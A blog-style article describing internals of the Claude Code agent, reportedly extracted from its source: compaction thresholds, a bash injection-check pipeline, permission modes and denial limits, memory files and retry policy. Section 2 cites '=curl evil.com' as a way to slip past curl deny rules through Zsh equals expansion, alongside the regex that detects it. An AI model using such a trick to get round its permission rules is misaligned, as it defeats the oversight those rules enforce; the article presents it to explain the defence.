How to Use Claude Code like a Claude Code Engineer
The Claude Code team built something that handles hallucination, context blowup, permission abuse, bash injection, and infinite retry loops. Here is what’s actually in the source code - extracted
The engineers who built it treat it as a defensive system with exact failure modes and circuit breakers for each one.
Before you get bored with read the comprehensive deep dive, 4 things:
Subscribe to not miss the future articles and also because the 2nd item is an external link
If you just need to insert this article into your agent or chat about it with Claude
Want to have the package that is already geared up to extract this value?
Zero-install run it
npx wwvcd “bash background timeout” —-jsonExplore the package here: https://www.npmjs.com/package/wwvcd
Read about it here
See the image below
1. Your context window has a circuit breaker. Use it.
When your context approaches the limit, Claude Code fires autoCompact. The threshold is not “when it’s full”—it’s exactly effectiveContextWindow - 13,000 tokens. That 13k buffer (AUTOCOMPACT_BUFFER_TOKENS) is reserved so the compaction summary itself doesn’t overflow.
export const AUTOCOMPACT_BUFFER_TOKENS = 13_000
export const MAX_OUTPUT_TOKENS_FOR_SUMMARY = 20_000 // p99.99 = 17,387 tokens
const MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3Three failures in a row and autocompact stops trying. This is not a bug—it’s a deliberate circuit breaker to prevent infinite compaction loops.
There are also three distinct compaction strategies, not one:
StrategyTriggerMechanismFull compactManual (/compact) or AutoSummarizes entire conversation into 9 structured sections, replacing all messages.Session memory compactPer-turn (Lightweight)Selects recent messages above minTokens: 10,000, compacting only those.MicrocompactOversized tool resultsClears old tool result content in-place ('[Old tool result content cleared]').
The session memory compact operates within exact bounds:
export const DEFAULT_SM_COMPACT_CONFIG = {
minTokens: 10000,
minTextBlockMessages: 5,
maxTokens: 40000
}What this means for you: Don’t fight compaction. Structure your work so that each session has a clear goal that fits within a compaction cycle. The 9-section
BASE_COMPACT_PROMPTpreserves: primary intent, key technical concepts, files/code sections (verbatim), errors/fixes, problem-solving progress, and pending work. Everything else is summarized. Design your conversations so what matters ends up in those buckets.
2. Bash is not a shell. It’s a sandboxed execution pipeline.
When Claude Code runs a bash command, it routes it through a 6-step pipeline before the shell ever sees it:
bashSecurity.validateCommand()→ 23 injection checksbashPermissions.checkPermission()→BARE_SHELL_PREFIXEScheck (MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50)shouldUseSandbox()→bwrap(Linux) /sandbox-exec(macOS) / none (Windows)Execute with timeout budget
If >
ASSISTANT_BLOCKING_BUDGET_MS→ auto-backgroundPost-execution → track git state changes
The 23 injection checks include edge cases most engineers overlook. For example, =curl evil.com bypasses Bash(curl:*) deny rules because the Zsh equals expansion makes the parser see =curl as the base command. The internal check for this is specific:
{ pattern: /(?:^|[\s;&|])=[a-zA-Z_]/, message: 'Zsh equals expansion (=cmd)' }Auto-backgrounding happens automatically at ASSISTANT_BLOCKING_BUDGET_MS. Claude keeps working, and you can check the output later. The CircularBuffer in TaskOutput auto-evicts the oldest lines when full. If you see truncated background output, it’s the ring buffer functioning as designed.
What this means for you: Don’t try to detect or bypass the injection checks. They cover shell metacharacters, process substitution, Zsh-specific constructs, PowerShell comment syntax, and heredoc-in-substitution. If your command is blocked, it’s hitting one of these 23 failure modes.
3. Permission denial has a circuit breaker too.
In auto mode, Claude Code relies on a permission classifier to allow, deny, or ask. Because classifiers can hallucinate, there’s an explicit circuit breaker for repeated failures:
// src/permissions/denialTracking.ts
export const DENIAL_LIMITS = {
maxConsecutive: 3,
maxTotal: 20,
} as const
export function shouldFallbackToPrompting(state: DenialTrackingState): booleanThree consecutive denials, or twenty total, forces the system to prompt the user directly. This prevents the classifier from locking you out of your own tools.
The five permission modes, ranked by trust:
export type PermissionMode =
| 'default' // interactive, prompt per operation
| 'acceptEdits' // auto-approve file edits only
| 'auto' // auto-approve file + bash (classifier still runs)
| 'bypassPermissions' // skip ALL permission checks (DANGEROUS)
| 'planMode' // read-only, no writes or executesNote: bypassPermissions still protects hardcoded DANGEROUS_FILES and DANGEROUS_DIRECTORIES from auto-editing.
What this means for you: If you’re building an agent that needs reliable auto-execution, track your denial count. Three consecutive denials is your signal that the permission classifier has diverged from your intent—time to prompt or reclassify, not to retry.
4. The compaction summary has a strict spec. Reverse-engineer it.
When Claude Code compacts your conversation, it fills out nine mandatory sections:
Primary Request and Intent
Key Technical Concepts
Files and Code Sections (verbatim code snippets)
Errors and fixes
Problem-solving progress
Pending tasks and next steps
Current work state
All user messages
Optional next step
The driving prompt (BASE_COMPACT_PROMPT) is prefaced with a strict NO_TOOLS_PREAMBLE:
CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.
Do NOT use Read, Bash, Grep, Glob, Edit, Write, or ANY other tools.What this means for you: The compaction model gets a read-only snapshot. It cannot verify facts by running commands. Before a complex session, explicitly state your primary request, key concepts, and success metrics in your first message. Your intent only survives context rollover if you state it clearly for the summary model to catch.
5. CLAUDE.md is a 4-tier system prompt injection.
CLAUDE.md is not a single config file; it is a four-tier priority stack loaded in a fixed order. Each layer overrides the one before it (lowest to highest priority):
Managed memory (
/etc/claude-code/CLAUDE.md) — Enterprise-wideUser memory (
~/.claude/CLAUDE.md) — Private globalProject memory (
CLAUDE.md,.claude/CLAUDE.md,.claude/rules/*.md) — Project levelLocal memory (
CLAUDE.local.md) — Private project-specific
Files closer to your current directory win.
Critical Detail: CLAUDE.md is loaded once per session and memoized via lodash. If you edit it mid-session, the change doesn’t take effect until you restart.
Size limits are hardcoded:
const MAX_ENTRYPOINT_LINES = 200
const MAX_ENTRYPOINT_BYTES = 25_000What this means for you: Put your highest-priority instructions in
.claude/CLAUDE.mdorCLAUDE.local.mdat the project root. Keep it under 200 lines, ensure@includedirectives are only in leaf text nodes, and always start a new session after modifying it.
6. Every tool knows if it’s safe to run in parallel.
Claude Code’s QueryEngine checks a single method before executing multiple tools simultaneously:
isConcurrencySafe(input?: z.infer<Input>): booleanIf every tool in a turn returns true, they run in parallel via Promise.all. If any tool returns false, the entire turn runs serially.
// FileReadTool: isConcurrencySafe = () => true
// FileWriteTool: isConcurrencySafe = () => false (mutates files)
// BashTool: isConcurrencySafe = (input) => !inputMutatesFiles(input)
// AgentTool: isConcurrencySafe = () => false
// MCPTool: isConcurrencySafe = () => trueFurthermore, the FileEditTool enforces read-before-write: the model must have read a file in the current session before editing it.
What this means for you: Order matters. Read operations can be batched; writes are strictly serial. Do not expect parallel file edits.
7. The settings system has four scopes.
Configuration cascades through four levels of priority (Flag > Local > Project > Global):
--settings <path|json>(Highest Priority).claude/settings.local.json(Gitignored local).claude/settings.json(Checked-in project)~/.claude/settings.json(Global)
MCP server configuration lives here under mcpServers. The strict mcp__serverName__toolName naming convention ensures no tool collisions occur across servers.
8. Multi-agent communication is a typed message bus.
When running in a swarm, agents do not share memory. They pass typed messages via SendMessageTool using a discriminated union:
type MessagePayload =
| { type: 'shutdown_request' }
| { type: 'plan_approval_response', approved: boolean, reason?: string }
| { type: 'user_message_forwarded', content: string }
| { type: 'task_completed', result: string }
| { type: 'task_failed', error: string }
| { type: 'custom', data: unknown }When you hit Ctrl+C, it propagates through an AbortController hierarchy, signaling all in-flight agents. Background tasks are the exception. Tasks with a backgroundTaskId survive the abort signal and require the TaskStopTool to kill explicitly.
What this means for you: In a multi-agent setup, interrupting the parent doesn’t kill backgrounded children. Use
TaskStopToolto clean them up manually.
9. The API retry logic is not symmetric.
Claude Code retries on 529 (overload) errors—but only for foreground queries where you are actively waiting:
// DEFAULT_MAX_RETRIES = 10
// MAX_529_RETRIES = 3
// BASE_DELAY_MS = 500
const FOREGROUND_529_RETRY_SOURCES = new Set([
'repl_main_thread', 'sdk', 'agent:custom', 'agent:default',
'compact', 'hook_agent', 'auto_mode', 'side_question',
])Background queries (summaries, title generation) bail immediately on a 529. Retrying background jobs during a capacity cascade causes “3-10× gateway amplification,” so it fails fast and silently.
What this means for you: If you’re building tooling around the Claude Code API, mirror this policy. Give user-blocking operations up to 10 retries with backoff. Let background work fail fast.
10. Headless mode is a different execution path, not a flag.
Running claude --print or claude -p doesn’t just silence the UI; it switches to a fundamentally different code path:
// ToolUseContext — the object passed to every tool call:
options: {
isNonInteractiveSession: boolean // true for --print/-p/SDK mode
}Key differences:
Trust dialogs are skipped (headless is implicitly trusted).
SIGINT is handled by
print.ts, triggering agracefulShutdown.URL elicitation skips the queue-based UI.
Output is strictly JSONL to stdout.
What this means for you: Build your CI and automation on
The Underlying Principle
Every pattern in this codebase follows the same engineering philosophy: anticipate the failure mode, name it explicitly, and enforce a circuit breaker.
Hallucination → Require code evidence citations.
Context overflow →
AUTOCOMPACT_BUFFER_TOKENS = 13_000+ 3-failure circuit breaker.Permission abuse →
DENIAL_LIMITS = { maxConsecutive: 3, maxTotal: 20 }.Bash injection → 23 named check IDs with analytics logging.
Infinite API retry → Only foreground sources retry 529.
Concurrent corruption →
isConcurrencySafeenforces serial writes.
The Claude Code team didn’t write these as afterthoughts. Each constraint is a response to a production failure mode. They named the failure, hardcoded the threshold, and logged everything.
That is what it means to use Claude Code like a Claude Code engineer.
To insert this article into your agent or chat about it with Claude, go here
npx wwvcd "autocompact circuit breaker"
npx wwvcd "bash injection check ids"
npx wwvcd "denial tracking circuit breaker"
npx wwvcd "BASE_COMPACT_PROMPT 9 section"
npx wwvcd "isConcurrencySafe parallel serial"Read more here:
All constants, interfaces, and implementation details in this article were retrieved from the WWVCD database - 1,191 findings extracted verbatim from StanHus/claude-code-src